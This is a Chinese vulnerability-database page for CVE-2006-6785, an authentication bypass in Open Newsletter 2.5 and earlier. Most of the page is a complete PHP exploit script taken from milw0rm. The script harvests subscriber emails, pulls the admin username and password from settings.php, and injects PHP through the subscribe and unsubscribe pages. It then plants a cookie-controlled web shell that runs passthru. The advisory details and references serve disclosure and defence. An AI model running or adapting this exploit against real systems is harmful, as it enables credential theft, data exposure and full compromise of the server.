Open Newsletter 'settings.php和subscribers.php'认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111846 漏洞类型 设计错误
发布时间 2006-12-23 更新时间 2007-01-21
CVE编号 CVE-2006-6785 CNNVD-ID CNNVD-200612-575
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2981
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-575
|漏洞详情
OpenNewsletter2.5及更早版本中的(1)settings.php和(2)subscribers.php脚本当认证失败没有退出,远程攻击者可以执行未授权管理员操作或者联合其他漏洞执行任意代码。
|漏洞EXP
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "\r\n";
echo "Open Newsletter <= 2.* Muliple Vulnerabilities\r\n";
echo "Site: http://www.selfexile.com/projects/opennewsletter/\r\n";
echo "Dork: \"This is a Free & Open Source mailing list manager\"\r\n";
echo "by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>\r\n";
echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n";
echo "Host:		target server (ip/hostname)\r\n";
echo "Path:		path to Open Newsletter\r\n";
echo "AttackType:	1 - Subscribers Email retrieve\r\n";
echo "		  |-> Related: None\r\n";
echo "		  |-> Es: php ".$argv[0]." localhost /opnletter/ 1\r\n\r\n";
echo "		2 - Credential Retrieve\r\n";
echo "		  |-> Related: None\r\n";
echo "		  |-> Es: php ".$argv[0]." localhost /opnletter/ 2\r\n\r\n";
echo "		3 - Remote Command Execution\r\n";
echo "		  |-> Related: None\r\n";
echo "		  |-> Es: php ".$argv[0]." localhost /opnletter/ 3 dir\r\n\r\n";
echo "\r\n";
echo "";
die;
}

/*
---

Ver 1.1 - fixed for mq=on

---
Some one told me that this was absolutely a very good scritp..
i think that the programmer nearly do not know PHP..
why? this is the only protection for admin files:
------------------------------------
	session_start();
	
	if($_SESSION["valid"] != true)
	{
	    header("Location: index.php");
	}
	
------------------------------------

do you remember that this one will only 'work' with normal browsers?
that the script will continue to be executed until the end?

this exploit only works with the conseguence of this..


Started programming: 18.31 22/12/2006
Ended: 19.39 22/12/2006

Merry Xmas and a happy new Hacking Year ^_^

BlackHawk <hawkgotyou@gmail.com>

PS: have some spear time? the 01/01 send me 'happy birthdate' emails ^_*
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy="";


if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

switch($attack_type)
{
case 1: //Email Retrieve
echo "Attack No 1 - Subscribers Email Retrieve\r\n";
echo "-- Start of Result--\r\n";
$packet ="GET ".$p."subscribers.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$dopo_campo = explode("<select class=textField name=email><option>",$html);
$prima_fine = explode("</option></select>",$dopo_campo[1]);
$emails = str_replace("</option><option>", "\r\n", $prima_fine[0]);
echo $emails;
echo "\r\n-- End of Result--";
break;

case 2: // Credential Retrieve
$usr_id=$argv[4];
echo "Attack No 2 - Credential Retrieve\r\n";
$packet ="GET ".$p."settings.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp = explode("<input class=textField type=text name='admin_username' value='", $html);
$user_name = explode("' title='", $temp[1]);
$temp2 = explode("<input class=textField type=text name='admin_password' value='", $html);
$user_password = explode("' title='", $temp2[1]);
$temp3 = explode("<input type=hidden name=old_db_file value=", $html);
$database_name = explode(">", $temp3[1]);
echo "UserName: ".$user_name[0]."\r\n";
echo "Password: ".$user_password[0]."\r\n";
echo "Database Name: ".$database_name[0]."\r\n";
break;

break;
case 3: // Command Execution
$cmd="";
for ($i=4; $i<=$argc-1; $i++){
$cmd.=" ".$argv[$i];
}

$packet ="GET ".$p."piggy_marty.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"69696"))
{
  echo "Exploit succeeded...\r\n";
  $temp69=explode("69696",$html);
  die("\r\n".$temp69[1]."\r\n");
}
$packet ='GET '.$p.'subscribe.php?action=subscribe&email=<?php%20$fp=fopen($_GET[nomeshell],$_GET[w]);fputs($fp,$_GET[shell]);fclose($fp);chmod($_GET[nomeshell],777);?> HTTP/1.0\r\n';
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);

echo "Attack No 3 - Remote Command Execution\r\n";
$packet ="GET ".$p."settings.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);

$temp = explode("<input class=textField type=text name='admin_username' value='", $html);
$user_name = explode("' title='", $temp[1]);
$temp2 = explode("<input class=textField type=text name='admin_password' value='", $html);
$user_password = explode("' title='", $temp2[1]);
$temp3 = explode("<input type=hidden name=old_db_file value=", $html);
$database_name = explode(">", $temp3[1]);
$temp4 = explode("<input class=textField type=text name='admin_name' value='", $html);
$admin_name = explode("' title='", $temp4[1]);
$temp5 = explode("<input class=textField type=text name='admin_email' value='", $html);
$admin_email = explode("' title='", $temp5[1]);
$temp6 = explode("<input class=textField type=text name='charset' value='", $html);
$chr = explode("' title='", $temp6[1]);
$temp7 = explode("<input class=textField type=text name='site_url' value='", $html);
$site_url = explode("' title='", $temp7[1]);
$temp8 = explode("<input class=textField type=text name='opennewsletter_dir' value='", $html);
$dir = explode("' title='", $temp8[1]);

$data="action=update";
$data.="&admin_username=".$user_name[0];
$data.="&admin_password=".$user_password[0];
$data.="&admin_name=".$admin_name[0];
$data.="&admin_email=".$admin_email[0];
$data.="&unsubscribe_link=on";
$data.="&charset=".$chr[0];
$data.="&site_url=".$site_url[0];
$data.="&opennewsletter_dir=".$dir[0];
$data.="&db_file=hello.php";
$data.="&old_db_file=".$database_name[0];
$packet="POST ".$p."settings.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
$shell = '<?php%20error_reporting(0);set_time_limit(0);if%20(get_magic_quotes_gpc())%20{$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo%2069696;passthru($_COOKIE[cmd]);echo%2069696;?>';
$packet ="GET ".$p."hello.php?w=w&shell=$shell&nomeshell=piggy_marty.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);
$packet ="GET ".$p."unsubscribe.php?email=<?php%20\$fp=fopen(\$_GET[nomeshell],\$_GET[w]);fputs(\$fp,\$_GET[shell]);fclose(\$fp);chmod(\$_GET[nomeshell],777);?> HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);
$data="action=update";
$data.="&admin_username=".$user_name[0];
$data.="&admin_password=".$user_password[0];
$data.="&admin_name=".$admin_name[0];
$data.="&admin_email=".$admin_email[0];
$data.="&unsubscribe_link=on";
$data.="&charset=".$chr[0];
$data.="&site_url=".$site_url[0];
$data.="&opennewsletter_dir=".$dir[0];
$data.="&db_file=".$database_name[0];
$data.="&old_db_file=".$database_name[0];
$packet="POST ".$p."settings.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
echo "Shell Created and Files Restored.. Now Try to execute command..\r\n\r\n";
$packet ="GET ".$p."piggy_marty.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"69696"))
{
  echo "Exploit succeeded...\r\n";
  $temp69=explode("69696",$html);
  die("\r\n".$temp69[1]."\r\n");
}
break;
}
?>

# milw0rm.com [2006-12-23]
|参考资料

来源:BID
名称:21775
链接:http://www.securityfocus.com/bid/21775
来源:MILW0RM
名称:2981
链接:http://www.milw0rm.com/exploits/2981
来源:SECUNIA
名称:23476
链接:http://secunia.com/advisories/23476
来源:MILW0RM
名称:2981
链接:http://milw0rm.com/exploits/2981